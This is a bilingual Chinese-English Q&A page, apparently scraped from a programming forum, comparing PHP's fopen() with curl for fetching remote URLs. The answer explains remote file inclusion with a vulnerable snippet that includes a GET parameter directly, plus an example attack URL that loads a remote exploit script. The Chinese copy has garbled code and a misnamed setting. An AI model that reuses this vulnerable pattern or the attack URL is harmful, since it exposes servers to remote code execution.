问题描述
我正在编写一些代码,需要通过HTTP(s)与web服务通信。在过去,我已经使用curl库。最近,我注意到,我可以简单地使用fopen()来访问远程URL,看起来简单得多。
Curl看起来更容易配置,选项。除了可配置性,使用哪种方法是否重要?
fopen()
如果是这样,那么更好,为什么?
allow_fopen_url
时打开远程URL。 但是在5.2.0之前的版本,这是非常危险的,因为 include
函数也会下载和解析 PHP代码远程站点。一个天真的编码器可以很容易地找到如下代码:
<?php
$ page = $ _GET [ '页'];
include($ page);
?>
攻击者只需要请求 http:// example .com / script.php?page = http://example.net/my_exploit_script
在系统上执行自己的代码并引入一个漏洞。不幸的是, allow_fopen_url
的默认值是'on'。
幸运的是,从5.2.0开始, 默认为off) allow_url_include
,可防止 include
下载远程代码。
就个人而言,如果你有选择使用Curl,使用而不是 fopen
p>
I'm writing some code that will need to speak to a web service over HTTP(s). In the past I've used the curl library. Recently, I noticed that I can simply use fopen() to access a remote URL and it seems far simpler.
Curl seems to be much more configurable, having a plethora of options. Beyond that configurability, does it matter which method is used? If so, which is better and why?
fopen()
will only open remote URLs if allow_fopen_url
is enabled in php.ini
.
However in versions prior to 5.2.0, this was exceedingly dangerous because the include
function would also download and parse PHP code from remote sites. A naive coder could easily be caught out with code like:
<?php
$page = $_GET['page'];
include($page);
?>
at which point an attacker just has to ask for http://example.com/script.php?page=http://example.net/my_exploit_script
to execute their own code on the system and introduce an exploit. Unfortunately the default value for allow_fopen_url
is 'on'.
Fortunately, since 5.2.0 there's a separate setting (which should default to 'off') called allow_url_include
which prevents include
from downloading remote code.
Personally, if you've got the option to use Curl, use that rather than fopen
.
这篇关于在PHP中使用fopen($ url)和curl之间的重要区别是什么?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持!